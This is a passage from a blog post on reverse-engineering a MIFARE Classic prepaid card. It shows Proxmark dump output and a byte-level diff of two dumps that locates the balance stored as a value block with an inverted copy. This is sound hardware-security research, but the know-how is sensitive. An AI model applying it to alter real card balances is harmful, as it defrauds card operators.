<span class="o">[=]</span>      |  58 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  59 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>   15 |  60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  61 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  62 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  63 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span> <span class="nt">-----</span>+-----+-------------------------------------------------+-----------------

<span class="o">[</span>+] Saved 1024 bytes to binary file <span class="sb">`</span>~/hf-mf-6C2FAC83-dump-001.bin<span class="sb">`</span>
<span class="o">[</span>+] Saved to json file ~/hf-mf-6C2FAC83-dump-001.json
</code></pre></div></div>

<p>At this point I had two dumps from the same card at two different balances: one from <code class="language-plaintext highlighter-rouge">autopwn</code> at <code class="language-plaintext highlighter-rouge">12.50</code>, and one after spending at <code class="language-plaintext highlighter-rouge">9.00</code>. The easiest way to find the stored value is to compare them and look for blocks that change in a way that matches the visible balance.</p>

<p>This is the point where the problem becomes relational. A value does not mean much in isolation; it starts to mean something when it changes, or when it is contrasted with another value. Bateson’s definition of information as <a href="https://www.goodreads.com/quotes/517599-information-is-a-difference-that-makes-a-difference" rel="external nofollow noopener" target="_blank">“a difference that makes a difference”</a> fits perfectly here: one dump is just noise, but two dumps, with one known thing changed, start to point at structure.</p>

<p>I used <a href="https://github.com/fedemengo/ssdp" rel="external nofollow noopener" target="_blank"><code class="language-plaintext highlighter-rouge">ssdp</code></a>, a small helper tool I wrote, to diff the binary dumps. The diff groups each 16-byte block into units. With <code class="language-plaintext highlighter-rouge">--units 1</code>, every single byte is its own unit, so the output can point to the exact changed byte instead of a larger 2-, 4-, or 8-byte chunk. That makes the output look like a block view with per-byte offsets, so a change at <code class="language-plaintext highlighter-rouge">+05</code> means byte <code class="language-plaintext highlighter-rouge">5</code> inside that block was modified.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;</span> ssdp diff <span class="nt">--units</span> 1 <span class="nt">--format</span> mf1k hf-mf-6C2FAC83-dump-0900.bin hf-mf-6C2FAC83-dump-1250.bin | <span class="nb">cat
</span>Inputs:
  data01: hf-mf-6C2FAC83-dump-0900.bin
  data02: hf-mf-6C2FAC83-dump-1250.bin

Diff blocks:
  <span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>6 <span class="nv">S</span><span class="o">=</span>1 <span class="nv">B</span><span class="o">=</span>2
  <span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>8 <span class="nv">S</span><span class="o">=</span>2 <span class="nv">B</span><span class="o">=</span>0
  <span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>9 <span class="nv">S</span><span class="o">=</span>2 <span class="nv">B</span><span class="o">=</span>1

<span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>6 <span class="nv">S</span><span class="o">=</span>1 <span class="nv">B</span><span class="o">=</span>2
  <span class="o">[</span><span class="nv">units</span><span class="o">=</span>1]
    data01: <span class="nv">FULL</span><span class="o">=[</span>92] | <span class="o">[</span>B3] | <span class="o">[</span>D9] | 34 | 00 | 00 | 00 | 00 | 00 | 00 | 00 | 00 | <span class="o">[</span>FB] | 01 | 00 | <span class="o">[</span>16]
    data02: <span class="nv">FULL</span><span class="o">=[</span>C5] | <span class="o">[</span>59] | <span class="o">[</span>C6] | 34 | 00 | 00 | 00 | 00 | 00 | 00 | 00 | 00 | <span class="o">[</span>F9] | 01 | 00 | <span class="o">[</span>04]
    <span class="o">!</span>+00
      data01: <span class="nv">RAW</span><span class="o">=</span>92 | <span class="nv">INT_LE</span><span class="o">=</span>       146 | <span class="nv">INT_BE</span><span class="o">=</span>       146 | <span class="nv">NOT_LE</span><span class="o">=</span>       109 | <span class="nv">NOT_BE</span><span class="o">=</span>       109 | <span class="nv">BIN</span><span class="o">=</span>10010010 | <span class="nv">BIN_NOT</span><span class="o">=</span>01101101 | <span class="nv">NOT_RAW</span><span class="o">=</span>6D
      data02: <span class="nv">RAW</span><span class="o">=</span>C5 | <span class="nv">INT_LE</span><span class="o">=</span>       197 | <span class="nv">INT_BE</span><span class="o">=</span>       197 | <span class="nv">NOT_LE</span><span class="o">=</span>        58 | <span class="nv">NOT_BE</span><span class="o">=</span>        58 | <span class="nv">BIN</span><span class="o">=</span>11000101 | <span class="nv">BIN_NOT</span><span class="o">=</span>00111010 | <span class="nv">NOT_RAW</span><span class="o">=</span>3A
    <span class="o">!</span>+01
      data01: <span class="nv">RAW</span><span class="o">=</span>B3 | <span class="nv">INT_LE</span><span class="o">=</span>       179 | <span class="nv">INT_BE</span><span class="o">=</span>       179 | <span class="nv">NOT_LE</span><span class="o">=</span>        76 | <span class="nv">NOT_BE</span><span class="o">=</span>        76 | <span class="nv">BIN</span><span class="o">=</span>10110011 | <span class="nv">BIN_NOT</span><span class="o">=</span>01001100 | <span class="nv">NOT_RAW</span><span class="o">=</span>4C
      data02: <span class="nv">RAW</span><span class="o">=</span>59 | <span class="nv">INT_LE</span><span class="o">=</span>        89 | <span class="nv">INT_BE</span><span class="o">=</span>        89 | <span class="nv">NOT_LE</span><span class="o">=</span>       166 | <span class="nv">NOT_BE</span><span class="o">=</span>       166 | <span class="nv">BIN</span><span class="o">=</span>01011001 | <span class="nv">BIN_NOT</span><span class="o">=</span>10100110 | <span class="nv">NOT_RAW</span><span class="o">=</span>A6
    <span class="o">!</span>+02
      data01: <span class="nv">RAW</span><span class="o">=</span>D9 | <span class="nv">INT_LE</span><span class="o">=</span>       217 | <span class="nv">INT_BE</span><span class="o">=</span>       217 | <span class="nv">NOT_LE</span><span class="o">=</span>        38 | <span class="nv">NOT_BE</span><span class="o">=</span>        38 | <span class="nv">BIN</span><span class="o">=</span>11011001 | <span class="nv">BIN_NOT</span><span class="o">=</span>00100110 | <span class="nv">NOT_RAW</span><span class="o">=</span>26
      data02: <span class="nv">RAW</span><span class="o">=</span>C6 | <span class="nv">INT_LE</span><span class="o">=</span>       198 | <span class="nv">INT_BE</span><span class="o">=</span>       198 | <span class="nv">NOT_LE</span><span class="o">=</span>        57 | <span class="nv">NOT_BE</span><span class="o">=</span>        57 | <span class="nv">BIN</span><span class="o">=</span>11000110 | <span class="nv">BIN_NOT</span><span class="o">=</span>00111001 | <span class="nv">NOT_RAW</span><span class="o">=</span>39
    <span class="o">!</span>+12
      data01: <span class="nv">RAW</span><span class="o">=</span>FB | <span class="nv">INT_LE</span><span class="o">=</span>       251 | <span class="nv">INT_BE</span><span class="o">=</span>       251 | <span class="nv">NOT_LE</span><span class="o">=</span>         4 | <span class="nv">NOT_BE</span><span class="o">=</span>         4 | <span class="nv">BIN</span><span class="o">=</span>11111011 | <span class="nv">BIN_NOT</span><span class="o">=</span>00000100 | <span class="nv">NOT_RAW</span><span class="o">=</span>04
      data02: <span class="nv">RAW</span><span class="o">=</span>F9 | <span class="nv">INT_LE</span><span class="o">=</span>       249 | <span class="nv">INT_BE</span><span class="o">=</span>       249 | <span class="nv">NOT_LE</span><span class="o">=</span>         6 | <span class="nv">NOT_BE</span><span class="o">=</span>         6 | <span class="nv">BIN</span><span class="o">=</span>11111001 | <span class="nv">BIN_NOT</span><span class="o">=</span>00000110 | <span class="nv">NOT_RAW</span><span class="o">=</span>06
    <span class="o">!</span>+15
      data01: <span class="nv">RAW</span><span class="o">=</span>16 | <span class="nv">INT_LE</span><span class="o">=</span>        22 | <span class="nv">INT_BE</span><span class="o">=</span>        22 | <span class="nv">NOT_LE</span><span class="o">=</span>       233 | <span class="nv">NOT_BE</span><span class="o">=</span>       233 | <span class="nv">BIN</span><span class="o">=</span>00010110 | <span class="nv">BIN_NOT</span><span class="o">=</span>11101001 | <span class="nv">NOT_RAW</span><span class="o">=</span>E9
      data02: <span class="nv">RAW</span><span class="o">=</span>04 | <span class="nv">INT_LE</span><span class="o">=</span>         4 | <span class="nv">INT_BE</span><span class="o">=</span>         4 | <span class="nv">NOT_LE</span><span class="o">=</span>       251 | <span class="nv">NOT_BE</span><span class="o">=</span>       251 | <span class="nv">BIN</span><span class="o">=</span>00000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>11111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>FB

<span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>8 <span class="nv">S</span><span class="o">=</span>2 <span class="nv">B</span><span class="o">=</span>0
  <span class="o">[</span><span class="nv">units</span><span class="o">=</span>1]
    data01: <span class="nv">FULL</span><span class="o">=[</span>84] | <span class="o">[</span>03] | 00 | 00 | <span class="o">[</span>7B] | <span class="o">[</span>FC] | FF | FF | <span class="o">[</span>84] | <span class="o">[</span>03] | 00 | 00 | 09 | F6 | 09 | F6
    data02: <span class="nv">FULL</span><span class="o">=[</span>E2] | <span class="o">[</span>04] | 00 | 00 | <span class="o">[</span>1D] | <span class="o">[</span>FB] | FF | FF | <span class="o">[</span>E2] | <span class="o">[</span>04] | 00 | 00 | 09 | F6 | 09 | F6
    <span class="o">!</span>+00
      data01: <span class="nv">RAW</span><span class="o">=</span>84 | <span class="nv">INT_LE</span><span class="o">=</span>       132 | <span class="nv">INT_BE</span><span class="o">=</span>       132 | <span class="nv">NOT_LE</span><span class="o">=</span>       123 | <span class="nv">NOT_BE</span><span class="o">=</span>       123 | <span class="nv">BIN</span><span class="o">=</span>10000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>01111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>7B
      data02: <span class="nv">RAW</span><span class="o">=</span>E2 | <span class="nv">INT_LE</span><span class="o">=</span>       226 | <span class="nv">INT_BE</span><span class="o">=</span>       226 | <span class="nv">NOT_LE</span><span class="o">=</span>        29 | <span class="nv">NOT_BE</span><span class="o">=</span>        29 | <span class="nv">BIN</span><span class="o">=</span>11100010 | <span class="nv">BIN_NOT</span><span class="o">=</span>00011101 | <span class="nv">NOT_RAW</span><span class="o">=</span>1D
    <span class="o">!</span>+01
      data01: <span class="nv">RAW</span><span class="o">=</span>03 | <span class="nv">INT_LE</span><span class="o">=</span>         3 | <span class="nv">INT_BE</span><span class="o">=</span>         3 | <span class="nv">NOT_LE</span><span class="o">=</span>       252 | <span class="nv">NOT_BE</span><span class="o">=</span>       252 | <span class="nv">BIN</span><span class="o">=</span>00000011 | <span class="nv">BIN_NOT</span><span class="o">=</span>11111100 | <span class="nv">NOT_RAW</span><span class="o">=</span>FC
      data02: <span class="nv">RAW</span><span class="o">=</span>04 | <span class="nv">INT_LE</span><span class="o">=</span>         4 | <span class="nv">INT_BE</span><span class="o">=</span>         4 | <span class="nv">NOT_LE</span><span class="o">=</span>       251 | <span class="nv">NOT_BE</span><span class="o">=</span>       251 | <span class="nv">BIN</span><span class="o">=</span>00000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>11111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>FB
    <span class="o">!</span>+04
      data01: <span class="nv">RAW</span><span class="o">=</span>7B | <span class="nv">INT_LE</span><span class="o">=</span>       123 | <span class="nv">INT_BE</span><span class="o">=</span>       123 | <span class="nv">NOT_LE</span><span class="o">=</span>       132 | <span class="nv">NOT_BE</span><span class="o">=</span>       132 | <span class="nv">BIN</span><span class="o">=</span>01111011 | <span class="nv">BIN_NOT</span><span class="o">=</span>10000100 | <span class="nv">NOT_RAW</span><span class="o">=</span>84
      data02: <span class="nv">RAW</span><span class="o">=</span>1D | <span class="nv">INT_LE</span><span class="o">=</span>        29 | <span class="nv">INT_BE</span><span class="o">=</span>        29 | <span class="nv">NOT_LE</span><span class="o">=</span>       226 | <span class="nv">NOT_BE</span><span class="o">=</span>       226 | <span class="nv">BIN</span><span class="o">=</span>00011101 | <span class="nv">BIN_NOT</span><span class="o">=</span>11100010 | <span class="nv">NOT_RAW</span><span class="o">=</span>E2
    <span class="o">!</span>+05
      data01: <span class="nv">RAW</span><span class="o">=</span>FC | <span class="nv">INT_LE</span><span class="o">=</span>       252 | <span class="nv">INT_BE</span><span class="o">=</span>       252 | <span class="nv">NOT_LE</span><span class="o">=</span>         3 | <span class="nv">NOT_BE</span><span class="o">=</span>         3 | <span class="nv">BIN</span><span class="o">=</span>11111100 | <span class="nv">BIN_NOT</span><span class="o">=</span>00000011 | <span class="nv">NOT_RAW</span><span class="o">=</span>03
      data02: <span class="nv">RAW</span><span class="o">=</span>FB | <span class="nv">INT_LE</span><span class="o">=</span>       251 | <span class="nv">INT_BE</span><span class="o">=</span>       251 | <span class="nv">NOT_LE</span><span class="o">=</span>         4 | <span class="nv">NOT_BE</span><span class="o">=</span>         4 | <span class="nv">BIN</span><span class="o">=</span>11111011 | <span class="nv">BIN_NOT</span><span class="o">=</span>00000100 | <span class="nv">NOT_RAW</span><span class="o">=</span>04
    <span class="o">!</span>+08
      data01: <span class="nv">RAW</span><span class="o">=</span>84 | <span class="nv">INT_LE</span><span class="o">=</span>       132 | <span class="nv">INT_BE</span><span class="o">=</span>       132 | <span class="nv">NOT_LE</span><span class="o">=</span>       123 | <span class="nv">NOT_BE</span><span class="o">=</span>       123 | <span class="nv">BIN</span><span class="o">=</span>10000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>01111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>7B
      data02: <span class="nv">RAW</span><span class="o">=</span>E2 | <span class="nv">INT_LE</span><span class="o">=</span>       226 | <span class="nv">INT_BE</span><span class="o">=</span>       226 | <span class="nv">NOT_LE</span><span class="o">=</span>        29 | <span class="nv">NOT_BE</span><span class="o">=</span>        29 | <span class="nv">BIN</span><span class="o">=</span>11100010 | <span class="nv">BIN_NOT</span><span class="o">=</span>00011101 | <span class="nv">NOT_RAW</span><span class="o">=</span>1D
    <span class="o">!</span>+09
      data01: <span class="nv">RAW</span><span class="o">=</span>03 | <span class="nv">INT_LE</span><span class="o">=</span>         3 | <span class="nv">INT_BE</span><span class="o">=</span>         3 | <span class="nv">NOT_LE</span><span class="o">=</span>       252 | <span class="nv">NOT_BE</span><span class="o">=</span>       252 | <span class="nv">BIN</span><span class="o">=</span>00000011 | <span class="nv">BIN_NOT</span><span class="o">=</span>11111100 | <span class="nv">NOT_RAW</span><span class="o">=</span>FC
      data02: <span class="nv">RAW</span><span class="o">=</span>04 | <span class="nv">INT_LE</span><span class="o">=</span>         4 | <span class="nv">INT_BE</span><span class="o">=</span>         4 | <span class="nv">NOT_LE</span><span class="o">=</span>       251 | <span class="nv">NOT_BE</span><span class="o">=</span>       251 | <span class="nv">BIN</span><span class="o">=</span>00000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>11111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>FB

<span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>9 <span class="nv">S</span><span class="o">=</span>2 <span class="nv">B</span><span class="o">=</span>1
  <span class="o">[</span><span class="nv">units</span><span class="o">=</span>1]
    data01: <span class="nv">FULL</span><span class="o">=[</span>84] | <span class="o">[</span>03] | 00 | 00 | <span class="o">[</span>7B] | <span class="o">[</span>FC] | FF | FF | <span class="o">[</span>84] | <span class="o">[</span>03] | 00 | 00 | 09 | F6 | 09 | F6
    data02: <span class="nv">FULL</span><span class="o">=[</span>E2] | <span class="o">[</span>04] | 00 | 00 | <span class="o">[</span>1D] | <span class="o">[</span>FB] | FF | FF | <span class="o">[</span>E2] | <span class="o">[</span>04] | 00 | 00 | 09 | F6 | 09 | F6
    <span class="o">!</span>+00
      data01: <span class="nv">RAW</span><span class="o">=</span>84 | <span class="nv">INT_LE</span><span class="o">=</span>       132 | <span class="nv">INT_BE</span><span class="o">=</span>       132 | <span class="nv">NOT_LE</span><span class="o">=</span>       123 | <span class="nv">NOT_BE</span><span class="o">=</span>       123 | <span class="nv">BIN</span><span class="o">=</span>10000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>01111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>7B
      data02: <span class="nv">RAW</span><span class="o">=</span>E2 | <span class="nv">INT_LE</span><span class="o">=</span>       226 | <span class="nv">INT_BE</span><span class="o">=</span>       226 | <span class="nv">NOT_LE</span><span class="o">=</span>        29 | <span class="nv">NOT_BE</span><span class="o">=</span>        29 | <span class="nv">BIN</span><span class="o">=</span>11100010 | <span class="nv">BIN_NOT</span><span class="o">=</span>00011101 | <span class="nv">NOT_RAW</span><span class="o">=</span>1D
    <span class="o">!</span>+01
      data01: <span class="nv">RAW</span><span class="o">=</span>03 | <span class="nv">INT_LE</span><span class="o">=</span>         3 | <span class="nv">INT_BE</span><span class="o">=</span>         3 | <span class="nv">NOT_LE</span><span class="o">=</span>       252 | <span class="nv">NOT_BE</span><span class="o">=</span>       252 | <span class="nv">BIN</span><span class="o">=</span>00000011 | <span class="nv">BIN_NOT</span><span class="o">=</span>11111100 | <span class="nv">NOT_RAW</span><span class="o">=</span>FC
      data02: <span class="nv">RAW</span><span class="o">=</span>04 | <span class="nv">INT_LE</span><span class="o">=</span>         4 | <span class="nv">INT_BE</span><span class="o">=</span>         4 | <span class="nv">NOT_LE</span><span class="o">=</span>       251 | <span class="nv">NOT_BE</span><span class="o">=</span>       251 | <span class="nv">BIN</span><span class="o">=</span>00000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>11111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>FB
    <span class="o">!</span>+04
      data01: <span class="nv">RAW</span><span class="o">=</span>7B | <span class="nv">INT_LE</span><span class="o">=</span>       123 | <span class="nv">INT_BE</span><span class="o">=</span>       123 | <span class="nv">NOT_LE</span><span class="o">=</span>       132 | <span class="nv">NOT_BE</span><span class="o">=</span>       132 | <span class="nv">BIN</span><span class="o">=</span>01111011 | <span class="nv">BIN_NOT</span><span class="o">=</span>10000100 | <span class="nv">NOT_RAW</span><span class="o">=</span>84
      data02: <span class="nv">RAW</span><span class="o">=</span>1D | <span class="nv">INT_LE</span><span class="o">=</span>        29 | <span class="nv">INT_BE</span><span class="o">=</span>        29 | <span class="nv">NOT_LE</span><span class="o">=</span>       226 | <span class="nv">NOT_BE</span><span class="o">=</span>       226 | <span class="nv">BIN</span><span class="o">=</span>00011101 | <span class="nv">BIN_NOT</span><span class="o">=</span>11100010 | <span class="nv">NOT_RAW</span><span class="o">=</span>E2
    <span class="o">!</span>+05
      data01: <span class="nv">RAW</span><span class="o">=</span>FC | <span class="nv">INT_LE</span><span class="o">=</span>       252 | <span class="nv">INT_BE</span><span class="o">=</span>       252 | <span class="nv">NOT_LE</span><span class="o">=</span>         3 | <span class="nv">NOT_BE</span><span class="o">=</span>         3 | <span class="nv">BIN</span><span class="o">=</span>11111100 | <span class="nv">BIN_NOT</span><span class="o">=</span>00000011 | <span class="nv">NOT_RAW</span><span class="o">=</span>03
      data02: <span class="nv">RAW</span><span class="o">=</span>FB | <span class="nv">INT_LE</span><span class="o">=</span>       251 | <span class="nv">INT_BE</span><span class="o">=</span>       251 | <span class="nv">NOT_LE</span><span class="o">=</span>         4 | <span class="nv">NOT_BE</span><span class="o">=</span>         4 | <span class="nv">BIN</span><span class="o">=</span>11111011 | <span class="nv">BIN_NOT</span><span class="o">=</span>00000100 | <span class="nv">NOT_RAW</span><span class="o">=</span>04
    <span class="o">!</span>+08
      data01: <span class="nv">RAW</span><span class="o">=</span>84 | <span class="nv">INT_LE</span><span class="o">=</span>       132 | <span class="nv">INT_BE</span><span class="o">=</span>       132 | <span class="nv">NOT_LE</span><span class="o">=</span>       123 | <span class="nv">NOT_BE</span><span class="o">=</span>       123 | <span class="nv">BIN</span><span class="o">=</span>10000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>01111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>7B
      data02: <span class="nv">RAW</span><span class="o">=</span>E2 | <span class="nv">INT_LE</span><span class="o">=</span>       226 | <span class="nv">INT_BE</span><span class="o">=</span>       226 | <span class="nv">NOT_LE</span><span class="o">=</span>        29 | <span class="nv">NOT_BE</span><span class="o">=</span>        29 | <span class="nv">BIN</span><span class="o">=</span>11100010 | <span class="nv">BIN_NOT</span><span class="o">=</span>00011101 | <span class="nv">NOT_RAW</span><span class="o">=</span>1D
    <span class="o">!</span>+09
      data01: <span class="nv">RAW</span><span class="o">=</span>03 | <span class="nv">INT_LE</span><span class="o">=</span>         3 | <span class="nv">INT_BE</span><span class="o">=</span>         3 | <span class="nv">NOT_LE</span><span class="o">=</span>       252 | <span class="nv">NOT_BE</span><span class="o">=</span>       252 | <span class="nv">BIN</span><span class="o">=</span>00000011 | <span class="nv">BIN_NOT</span><span class="o">=</span>11111100 | <span class="nv">NOT_RAW</span><span class="o">=</span>FC
      data02: <span class="nv">RAW</span><span class="o">=</span>04 | <span class="nv">INT_LE</span><span class="o">=</span>         4 | <span class="nv">INT_BE</span><span class="o">=</span>         4 | <span class="nv">NOT_LE</span><span class="o">=</span>       251 | <span class="nv">NOT_BE</span><span class="o">=</span>       251 | <span class="nv">BIN</span><span class="o">=</span>00000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>11111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>FB

</code></pre></div></div>

<p>This is useful, but it is also noisy. The interesting changes tend to come in adjacent byte pairs, so it makes sense to run the same comparison again with <code class="language-plaintext highlighter-rouge">--units 2</code>. That gives a better view of 16-bit values, which is exactly the kind of encoding I would expect for a small balance.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;</span> ssdp diff <span class="nt">--units</span> 2 <span class="nt">--format</span> mf1k hf-mf-6C2FAC83-dump-0900.bin hf-mf-6C2FAC83-dump-1250.bin | <span class="nb">cat
</span>Inputs:
  data01: hf-mf-6C2FAC83-dump-0900.bin
  data02: hf-mf-6C2FAC83-dump-1250.bin

Diff blocks:
  <span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>6 <span class="nv">S</span><span class="o">=</span>1 <span class="nv">B</span><span class="o">=</span>2
  <span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>8 <span class="nv">S</span><span class="o">=</span>2 <span class="nv">B</span><span class="o">=</span>0
  <span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>9 <span class="nv">S</span><span class="o">=</span>2 <span class="nv">B</span><span class="o">=</span>1

<span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>6 <span class="nv">S</span><span class="o">=</span>1 <span class="nv">B</span><span class="o">=</span>2
  <span class="o">[</span><span class="nv">units</span><span class="o">=</span>2]
    data01: <span class="nv">FULL</span><span class="o">=[</span>92 B3] | <span class="o">[</span>D9 34] | 00 00 | 00 00 | 00 00 | 00 00 | <span class="o">[</span>FB 01] | <span class="o">[</span>00 16]
    data02: <span class="nv">FULL</span><span class="o">=[</span>C5 59] | <span class="o">[</span>C6 34] | 00 00 | 00 00 | 00 00 | 00 00 | <span class="o">[</span>F9 01] | <span class="o">[</span>00 04]
    <span class="o">!</span>+00
      data01: <span class="nv">RAW</span><span class="o">=</span>92 B3 | <span class="nv">INT_LE</span><span class="o">=</span>     45970 | <span class="nv">INT_BE</span><span class="o">=</span>     37555 | <span class="nv">NOT_LE</span><span class="o">=</span>     19565 | <span class="nv">NOT_BE</span><span class="o">=</span>     27980 | <span class="nv">BIN</span><span class="o">=</span>1011001110010010 | <span class="nv">BIN_NOT</span><span class="o">=</span>0100110001101101 | <span class="nv">NOT_RAW</span><span class="o">=</span>6D 4C
      data02: <span class="nv">RAW</span><span class="o">=</span>C5 59 | <span class="nv">INT_LE</span><span class="o">=</span>     22981 | <span class="nv">INT_BE</span><span class="o">=</span>     50521 | <span class="nv">NOT_LE</span><span class="o">=</span>     42554 | <span class="nv">NOT_BE</span><span class="o">=</span>     15014 | <span class="nv">BIN</span><span class="o">=</span>0101100111000101 | <span class="nv">BIN_NOT</span><span class="o">=</span>1010011000111010 | <span class="nv">NOT_RAW</span><span class="o">=</span>3A A6
    <span class="o">!</span>+02
      data01: <span class="nv">RAW</span><span class="o">=</span>D9 34 | <span class="nv">INT_LE</span><span class="o">=</span>     13529 | <span class="nv">INT_BE</span><span class="o">=</span>     55604 | <span class="nv">NOT_LE</span><span class="o">=</span>     52006 | <span class="nv">NOT_BE</span><span class="o">=</span>      9931 | <span class="nv">BIN</span><span class="o">=</span>0011010011011001 | <span class="nv">BIN_NOT</span><span class="o">=</span>1100101100100110 | <span class="nv">NOT_RAW</span><span class="o">=</span>26 CB
      data02: <span class="nv">RAW</span><span class="o">=</span>C6 34 | <span class="nv">INT_LE</span><span class="o">=</span>     13510 | <span class="nv">INT_BE</span><span class="o">=</span>     50740 | <span class="nv">NOT_LE</span><span class="o">=</span>     52025 | <span class="nv">NOT_BE</span><span class="o">=</span>     14795 | <span class="nv">BIN</span><span class="o">=</span>0011010011000110 | <span class="nv">BIN_NOT</span><span class="o">=</span>1100101100111001 | <span class="nv">NOT_RAW</span><span class="o">=</span>39 CB
    <span class="o">!</span>+12
      data01: <span class="nv">RAW</span><span class="o">=</span>FB 01 | <span class="nv">INT_LE</span><span class="o">=</span>       507 | <span class="nv">INT_BE</span><span class="o">=</span>     64257 | <span class="nv">NOT_LE</span><span class="o">=</span>     65028 | <span class="nv">NOT_BE</span><span class="o">=</span>      1278 | <span class="nv">BIN</span><span class="o">=</span>0000000111111011 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111111000000100 | <span class="nv">NOT_RAW</span><span class="o">=</span>04 FE
      data02: <span class="nv">RAW</span><span class="o">=</span>F9 01 | <span class="nv">INT_LE</span><span class="o">=</span>       505 | <span class="nv">INT_BE</span><span class="o">=</span>     63745 | <span class="nv">NOT_LE</span><span class="o">=</span>     65030 | <span class="nv">NOT_BE</span><span class="o">=</span>      1790 | <span class="nv">BIN</span><span class="o">=</span>0000000111111001 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111111000000110 | <span class="nv">NOT_RAW</span><span class="o">=</span>06 FE
    <span class="o">!</span>+14
      data01: <span class="nv">RAW</span><span class="o">=</span>00 16 | <span class="nv">INT_LE</span><span class="o">=</span>      5632 | <span class="nv">INT_BE</span><span class="o">=</span>        22 | <span class="nv">NOT_LE</span><span class="o">=</span>     59903 | <span class="nv">NOT_BE</span><span class="o">=</span>     65513 | <span class="nv">BIN</span><span class="o">=</span>0001011000000000 | <span class="nv">BIN_NOT</span><span class="o">=</span>1110100111111111 | <span class="nv">NOT_RAW</span><span class="o">=</span>FF E9
      data02: <span class="nv">RAW</span><span class="o">=</span>00 04 | <span class="nv">INT_LE</span><span class="o">=</span>      1024 | <span class="nv">INT_BE</span><span class="o">=</span>         4 | <span class="nv">NOT_LE</span><span class="o">=</span>     64511 | <span class="nv">NOT_BE</span><span class="o">=</span>     65531 | <span class="nv">BIN</span><span class="o">=</span>0000010000000000 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111101111111111 | <span class="nv">NOT_RAW</span><span class="o">=</span>FF FB

<span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>8 <span class="nv">S</span><span class="o">=</span>2 <span class="nv">B</span><span class="o">=</span>0
  <span class="o">[</span><span class="nv">units</span><span class="o">=</span>2]
    data01: <span class="nv">FULL</span><span class="o">=[</span>84 03] | 00 00 | <span class="o">[</span>7B FC] | FF FF | <span class="o">[</span>84 03] | 00 00 | 09 F6 | 09 F6
    data02: <span class="nv">FULL</span><span class="o">=[</span>E2 04] | 00 00 | <span class="o">[</span>1D FB] | FF FF | <span class="o">[</span>E2 04] | 00 00 | 09 F6 | 09 F6
    <span class="o">!</span>+00
      data01: <span class="nv">RAW</span><span class="o">=</span>84 03 | <span class="nv">INT_LE</span><span class="o">=</span>       900 | <span class="nv">INT_BE</span><span class="o">=</span>     33795 | <span class="nv">NOT_LE</span><span class="o">=</span>     64635 | <span class="nv">NOT_BE</span><span class="o">=</span>     31740 | <span class="nv">BIN</span><span class="o">=</span>0000001110000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111110001111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>7B FC
      data02: <span class="nv">RAW</span><span class="o">=</span>E2 04 | <span class="nv">INT_LE</span><span class="o">=</span>      1250 | <span class="nv">INT_BE</span><span class="o">=</span>     57860 | <span class="nv">NOT_LE</span><span class="o">=</span>     64285 | <span class="nv">NOT_BE</span><span class="o">=</span>      7675 | <span class="nv">BIN</span><span class="o">=</span>0000010011100010 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111101100011101 | <span class="nv">NOT_RAW</span><span class="o">=</span>1D FB
    <span class="o">!</span>+04
      data01: <span class="nv">RAW</span><span class="o">=</span>7B FC | <span class="nv">INT_LE</span><span class="o">=</span>     64635 | <span class="nv">INT_BE</span><span class="o">=</span>     31740 | <span class="nv">NOT_LE</span><span class="o">=</span>       900 | <span class="nv">NOT_BE</span><span class="o">=</span>     33795 | <span class="nv">BIN</span><span class="o">=</span>1111110001111011 | <span class="nv">BIN_NOT</span><span class="o">=</span>0000001110000100 | <span class="nv">NOT_RAW</span><span class="o">=</span>84 03
